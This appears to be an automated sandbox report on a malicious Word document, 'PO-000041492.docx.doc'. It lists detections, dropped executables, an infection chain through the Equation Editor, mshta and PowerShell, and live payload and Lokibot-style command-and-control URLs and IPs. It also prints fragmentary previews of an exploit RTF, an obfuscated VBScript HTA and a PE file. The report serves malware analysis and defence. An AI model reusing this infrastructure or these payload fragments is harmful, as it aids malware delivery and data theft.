Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	111 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO-000041492.docx.doc	8%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\wininit.exe	100%	Avira	HEUR/AGEN.1306899
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\caspol[1].exe	100%	Avira	HEUR/AGEN.1306899
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18F2865F.doc	100%	Avira	HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns[1].doc	100%	Avira	HEUR/Rtf.Malformed
C:\Users\user\AppData\Roaming\wininit.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\caspol[1].exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://66.63.187.231/33/caspol.exeY	0%	Avira URL Cloud	safe
http://94.156.177.41/maxzi/five/fre.php	100%	Avira URL Cloud	malware
http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.hta	0%	Avira URL Cloud	safe
http://66.63.187.231/xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc	0%	Avira URL Cloud	safe
http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaMd	0%	Avira URL Cloud	safe
http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htafd	0%	Avira URL Cloud	safe
http://66.63.187.231/33/caspol.exe	0%	Avira URL Cloud	safe
http://66.63.187.231/xampp/wer/we/	0%	Avira URL Cloud	safe
http://66.63.187.231/33/caspol.eln	0%	Avira URL Cloud	safe
http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaj	0%	Avira URL Cloud	safe
https://provit.uk/Ib9yLe?&shoelace=strong&skyscraper=discreet&roll=thoughtful&mimosa=wacky&vulture	0%	Avira URL Cloud	safe
94.156.177.41/maxzi/five/fre.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
provit.uk	198.244.140.41	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.hta	true	Avira URL Cloud: safe	unknown
http://66.63.187.231/xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc	true	Avira URL Cloud: safe	unknown
http://66.63.187.231/33/caspol.exe	true	Avira URL Cloud: safe	unknown
http://kbfvzoboss.bid/alien/fre.php	false		high
http://94.156.177.41/maxzi/five/fre.php	true	Avira URL Cloud: malware	unknown
http://alphastand.top/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
94.156.177.41/maxzi/five/fre.php	true	Avira URL Cloud: malware	unknown
http://alphastand.trade/alien/fre.php	false		high
https://provit.uk/Ib9yLe?&shoelace=strong&skyscraper=discreet&roll=thoughtful&mimosa=wacky&vulture	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaj	EQNEDT32.EXE, 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ibsensoftware.com/	wininit.exe, wininit.exe, 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaMd	EQNEDT32.EXE, 00000008.00000002.390071517.000000000032F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://66.63.187.231/xampp/wer/we/	we on 66.63.187.231.url.0.dr	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://66.63.187.231/33/caspol.exeY	powershell.exe, 0000000A.00000002.423235653.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://66.63.187.231/33/caspol.eln	powershell.exe, 0000000A.00000002.415492102.00000000020CA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htafd	EQNEDT32.EXE, 00000008.00000002.390071517.000000000032F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000A.00000002.415492102.0000000001F91000.00000004.00000800.00020000.00000000.sdmp, wininit.exe, 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.micros	powershell.exe, 0000000A.00000002.415492102.00000000020CA000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
198.244.140.41	provit.uk	United States	18630	RIDLEYSD-NETUS	false
66.63.187.231	unknown	United States	8100	ASN-QUADRANET-GLOBALUS	true
94.156.177.41	unknown	Bulgaria	43561	NET1-ASBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1559210
Start date and time:	2024-11-20 10:10:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO-000041492.docx.doc
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@22/41@7/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 87 Number of non-executed functions: 15
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe, svchost.exe
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: PO-000041492.docx.doc

Simulations

Behavior and APIs

Time	Type	Description
04:11:14	API Interceptor	43x Sleep call for process: EQNEDT32.EXE modified
04:11:16	API Interceptor	24x Sleep call for process: mshta.exe modified
04:11:17	API Interceptor	105x Sleep call for process: powershell.exe modified
04:11:27	API Interceptor	8771x Sleep call for process: wininit.exe modified
04:11:36	API Interceptor	8x Sleep call for process: verclsid.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
198.244.140.41	Credit_DetailsCBS24312017918.xla.xlsx	Get hash	malicious	HTMLPhisher	Browse
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse
	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse
66.63.187.231	seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	66.63.187.231/657/caspol.exe
66.63.187.231	PO-000041492.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	66.63.187.231/xampp/noc/seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta
94.156.177.41	ECxDwGGFH3.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/simple/five/fre.php
	greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	94.156.177.41/simple/five/fre.php
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41/simple/five/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
provit.uk	Credit_DetailsCBS24312017918.xla.xlsx	Get hash	malicious	HTMLPhisher	Browse	198.244.140.41
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	198.244.140.41
	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse	198.244.140.41

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASN-QUADRANET-GLOBALUS	________.exe	Get hash	malicious	Quasar	Browse	69.174.98.113
	seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	66.63.187.231
	PO-000041492.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	66.63.187.231
	RFQ541634_A_URGENT_QUOTATION_SHENLE.exe	Get hash	malicious	GuLoader	Browse	64.188.27.210
	Order88983273293729387293828PDF.exe	Get hash	malicious	Quasar	Browse	72.11.156.80
	.main.elf	Get hash	malicious	Xmrig	Browse	66.63.187.200
	mips.elf	Get hash	malicious	Mirai	Browse	104.223.82.201
	Trykblgens.exe	Get hash	malicious	GuLoader	Browse	172.93.187.72
	QUOTATION #46789RFQ_SUPLM_NOV24_SALEH_CONSTRUCTIONS_LLC_PDF.exe	Get hash	malicious	Remcos, DarkTortilla	Browse	66.63.163.134
	COTIZACIONSyCONSULTA#46789NOV24.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	204.44.127.85
NET1-ASBG	ECxDwGGFH3.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41
	greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	94.156.177.41
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41
	WjcXwIcclB.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41
	0aA7F59xDl.exe	Get hash	malicious	Lokibot	Browse	94.156.177.95
	givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	94.156.177.95
	seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	94.156.177.95
	seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	94.156.177.95
	PO-000041492.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.95
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.95
RIDLEYSD-NETUS	Credit_DetailsCBS24312017918.xla.xlsx	Get hash	malicious	HTMLPhisher	Browse	198.244.140.41
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	198.244.140.41
	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse	198.244.140.41
	nabspc.elf	Get hash	malicious	Unknown	Browse	198.244.7.173
	https://instagrambeta.github.io/	Get hash	malicious	HTMLPhisher	Browse	198.244.231.90
	SecuriteInfo.com.Trojan.WinGo.Agent.27329.6060.exe	Get hash	malicious	Unknown	Browse	198.244.179.42
	Informations.bat	Get hash	malicious	PureLog Stealer, XWorm	Browse	198.244.206.37
	Beopajki.exe	Get hash	malicious	HVNC, PureLog Stealer, XWorm	Browse	198.244.206.37
	Your_New_Social_Security_Statement.wsf	Get hash	malicious	XWorm	Browse	198.244.251.236
	http://www.loroc.co.uk/	Get hash	malicious	Unknown	Browse	198.244.213.27

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse	198.244.140.41
	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	198.244.140.41
	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse	198.244.140.41
	Order_Summary.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	198.244.140.41
	INV-#000497053.doc	Get hash	malicious	Unknown	Browse	198.244.140.41
	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	198.244.140.41
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	198.244.140.41
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	198.244.140.41
	http://xoilacxd.cc	Get hash	malicious	Unknown	Browse	198.244.140.41
	Order_Confirmation.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	198.244.140.41
7dcce5b76c8b17472d024758970a406b	Credit_DetailsCBS24312017918.xla.xlsx	Get hash	malicious	HTMLPhisher	Browse	198.244.140.41
	PO-000041492.xls	Get hash	malicious	Unknown	Browse	198.244.140.41
	Credit_DetailsCBS24312017915.xla.xlsx	Get hash	malicious	Unknown	Browse	198.244.140.41
	PO-000041492.xls	Get hash	malicious	Unknown	Browse	198.244.140.41
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	198.244.140.41
	Credit_DetailsCBS24312017915.xla.xlsx	Get hash	malicious	Unknown	Browse	198.244.140.41
	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse	198.244.140.41
	PO-73375.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	198.244.140.41
	PO-000041492.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	198.244.140.41
	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse	198.244.140.41

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025668551963191094
Encrypted:	false
SSDEEP:	6:I3DPcDEHvxggLRDQuXSHlRiZTtRXv//4tfnRujlw//+GtluJ/eRuj:I3DPbX7ylWTvYg3J/
MD5:	16856C02C25CD6C0F7CBDF82EE6A881E
SHA1:	1E1276ACAB8DB258721221765E8A04131F637A04
SHA-256:	571C51C64FF3D3C3FCFE0B3D1D9CFB614EBAFF3B3855BAF450732CF440402B6E
SHA-512:	9D6039785AD07E382BD8AE857C02C0D0633BE37E33C12D35DCB05F212A206C92DF02A2E93BA7A84B418EE6E40AA4D3BDB38C5FB4EC2BE66AF62CB77047A9098C
Malicious:	false
Preview:	......M.eFy...z..n..&B.!..8...S,...X.F...Fa.q............................;..(.5K...%q\2K............{..L...C..j.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4760
Entropy (8bit):	4.834060479684549
Encrypted:	false
SSDEEP:	96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
MD5:	838C1F472806CF4BA2A9EC49C27C2847
SHA1:	D1C63579585C4740956B099697C74AD3E7C89751
SHA-256:	40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
SHA-512:	E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
Malicious:	false
Preview:	PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\caspol[1].exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	600576
Entropy (8bit):	7.913749036393697
Encrypted:	false
SSDEEP:	12288:VrOj+Ri3AgFdZeDZskwkzA0+7xUNq4KC73vUECPnsSnR83PdB0:xQ3AgSskwZNeEqdCPssS3F
MD5:	66B03D1AFF27D81E62B53FC108806211
SHA1:	2557EC8B32D0B42CAC9CABDE199D31C5D4E40041
SHA-256:	59586E753C54629F428A6B880F6AFF09F67AF0ACE76823AF3627DDA2281532E4
SHA-512:	9F8EF3DD8C482DEBB535B1E7C9155E4AB33A04F8C4F31ADE9E70ADBD5598362033785438D5D60C536A801E134E09FCD1BC80FC7AED2D167AF7F531A81F12E43D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:=g..............0...... .......&... ...@....@.. ....................................`..................................&..O....@..\|....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...\|....@......................@..@.reloc.......`.......(..............@..B.................&......H........6...(...........^................................................(......}.....{....r...p .....o5....{....o7...&....0...........{......o9.....}........&.......................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=..............+..E..........\b......2.{....oA...n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestoptionforentiretimegivenmebackwithsuchagreatthignswithentiretimewithmegoodseethebestthignsalwaysgivnebestthigns[1].doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Rich Text Format data, version 1
Category:	dropped
Size (bytes):	257200
Entropy (8bit):	2.34699194550343
Encrypted:	false
SSDEEP:	3072:sUcN1DaxXp1sAkC5gCQqCv7L5FokmFJcmrmR3D:slruZ1sA55gCQBL5FokmFyCmR3D
MD5:	E6859034A42F217800B6BF0980E93848
SHA1:	8DCB69DCF727B7A7FBFBF6755492990DC51FD192
SHA-256:	564A4E9044BD96C3C67AE4C596664A2D9A7ECD1962872AC836E051949FB109B1
SHA-512:	778CEEFC76571268A7C82C18EC1B6F6661B4F696D2612528B8EB94488383C84C9DBA6613CD5B1C715514E64D062D73D28D84395F30DADB4FD2DA51CBAC372D35
Malicious:	true
Yara Hits:	Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns[1].doc, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	{\rtf1..........{\\pnaiu472632820 \"}.{\6420395929598_&=)@?=7(@06?3%%'(??-'>`1<.$0'8\|`_[.?0]%_.:@&^8..1.\|..43?>_96?=?!.%=#?%~/;!+(,#^%`$!!?0?!]%<0-00>)!.43\|?6$.?:$#[$.>9:^^&$.</5~-(,]:^3<;;7!+5/^.?;$-<(.3.=71[??.86+06;$'845?<(?6@`!_7?,@;-@&-3%_&-9&$%0_%!:?'?[`:?9&/?&?1`.3.?'7%?8=_`70)4?-6[0$5``.\|\|%~+$2.6()/0=.10.9..?#86<?%7_>:1??_/2~4)+.5(%^#149:.^=7+&'`.4?/11?_+0=%`+~:?.'[?%^#?4=,,_`\|?.?.$6#%>&>;)+4?9?0?~&-`'??8)8%.<'=.#9#3-'5:$%%[6[:1##..@=&.3&=.5`5.??8/-8&[^?=?.\|^/?&~(]/#<~.9[8?.?4]+%@@%.2-.64>.<.1>`(70?\|8`$?1,~[^8?0)?=;,?#>:9=%;?%.=^0<$9)%&-4([&`?448\|2[;+~<7#-<67]651470..`[??=.)01+@12~#['3?=7??0+~?,&88[?%],23$'.[?,3%>@-&.??.%??[3+1...@@=!193)%?<(.[%.?%:)(/:9[$??&-4[?!#2;8:4=.2]-%^+'=.?+!$?2.6^%:\|'`:_)/~\|;]/]6'/-.@2?~2.?#:'%&-5%~5/[.^84??(..\|^:[@7=8]!'7<(\|?\|1^.`#\|.-^80?3?3\|#??\|\|~.7$#8;?.#7=?%&?=[$92(_@?([)~$`99,#66)/2]_`?@.#.8]<@([?:;&7'$8>![3!?%1;/08)=<`:$06.3?3\|,0$>~:.[%,.?~&?)\|%:'?5 4+9#(4-/]?)4_)3!.7&$????;%?=50.]7_%'0&;?2_$$+~4[2!^?#,$?]!-4)'$=>1<63'.-<^85

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\goodtoseeuthatgreatthingswithentirethingsgreatfor[1].hta

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	HTML document, ASCII text, with very long lines (23388), with CRLF line terminators
Category:	dropped
Size (bytes):	23556
Entropy (8bit):	1.6848932886813717
Encrypted:	false
SSDEEP:	96:C2vy2KJTuvPTTwduJZA6/3P42e2+ip2k+:TLwuv6QP5f+F3
MD5:	EC0D423A3F72D69975A1E31A275F5377
SHA1:	213922FB8456ECAADC24889AFEC1AC6EF5010C68
SHA-256:	9FD433CD543AB161D2A3CCB96A265C79EE0BB1A513647C0C33C72114660C64AC
SHA-512:	8132F567ABFD4E3489204D1F3A9FC8292457CE10495345CD0CCFA8074233411C8305C4D73078A7DEE02B086FBC22B8AD7047DD4BC127DE337D0800771EDF53AD
Malicious:	true
Preview:	<!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >..<html>..<body>..<ScRipT LANGuagE="vBscRIpT">..DIm..............................................................................................................................................................................................................................................................................................................................................tzHLdKvsEcRWyQFPNHoyTeRtKqrFUgUlAoRyLWkDbyxAAzslucnYWlBayRmyLBfwwVLvflcYiZZEpfzNUcHCcwlZBMnkhugupWLqSGPRjiRWzLULwlRXTOODbDPFQNUvpSkWIiuwlAwrOtAtidmZdngahQoxtJqNCmFehSLdxChEPdkYlgmxnXjGbbfCAhnKlFqCZNLZaRvxkRURPVoeiRQJQNIGSlJCzyNdRVnAdTGK..............................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18F2865F.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Rich Text Format data, version 1
Category:	dropped
Size (bytes):	257200
Entropy (8bit):	2.34699194550343
Encrypted:	false
SSDEEP:	3072:sUcN1DaxXp1sAkC5gCQqCv7L5FokmFJcmrmR3D:slruZ1sA55gCQBL5FokmFyCmR3D
MD5:	E6859034A42F217800B6BF0980E93848
SHA1:	8DCB69DCF727B7A7FBFBF6755492990DC51FD192
SHA-256:	564A4E9044BD96C3C67AE4C596664A2D9A7ECD1962872AC836E051949FB109B1
SHA-512:	778CEEFC76571268A7C82C18EC1B6F6661B4F696D2612528B8EB94488383C84C9DBA6613CD5B1C715514E64D062D73D28D84395F30DADB4FD2DA51CBAC372D35
Malicious:	true
Yara Hits:	Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18F2865F.doc, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	{\rtf1..........{\\pnaiu472632820 \"}.{\6420395929598_&=)@?=7(@06?3%%'(??-'>`1<.$0'8\|`_[.?0]%_.:@&^8..1.\|..43?>_96?=?!.%=#?%~/;!+(,#^%`$!!?0?!]%<0-00>)!.43\|?6$.?:$#[$.>9:^^&$.</5~-(,]:^3<;;7!+5/^.?;$-<(.3.=71[??.86+06;$'845?<(?6@`!_7?,@;-@&-3%_&-9&$%0_%!:?'?[`:?9&/?&?1`.3.?'7%?8=_`70)4?-6[0$5``.\|\|%~+$2.6()/0=.10.9..?#86<?%7_>:1??_/2~4)+.5(%^#149:.^=7+&'`.4?/11?_+0=%`+~:?.'[?%^#?4=,,_`\|?.?.$6#%>&>;)+4?9?0?~&-`'??8)8%.<'=.#9#3-'5:$%%[6[:1##..@=&.3&=.5`5.??8/-8&[^?=?.\|^/?&~(]/#<~.9[8?.?4]+%@@%.2-.64>.<.1>`(70?\|8`$?1,~[^8?0)?=;,?#>:9=%;?%.=^0<$9)%&-4([&`?448\|2[;+~<7#-<67]651470..`[??=.)01+@12~#['3?=7??0+~?,&88[?%],23$'.[?,3%>@-&.??.%??[3+1...@@=!193)%?<(.[%.?%:)(/:9[$??&-4[?!#2;8:4=.2]-%^+'=.?+!$?2.6^%:\|'`:_)/~\|;]/]6'/-.@2?~2.?#:'%&-5%~5/[.^84??(..\|^:[@7=8]!'7<(\|?\|1^.`#\|.-^80?3?3\|#??\|\|~.7$#8;?.#7=?%&?=[$92(_@?([)~$`99,#66)/2]_`?@.#.8]<@([?:;&7'$8>![3!?%1;/08)=<`:$06.3?3\|,0$>~:.[%,.?~&?)\|%:'?5 4+9#(4-/]?)4_)3!.7&$????;%?=50.]7_%'0&;?2_$$+~4[2!^?#,$?]!-4)'$=>1<63'.-<^85

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\521ACD4.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7428
Entropy (8bit):	5.614949866122965
Encrypted:	false
SSDEEP:	96:yJBOblJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHGXED:yGTNAK4oOIGbK1RvVwPAWmOHGXw
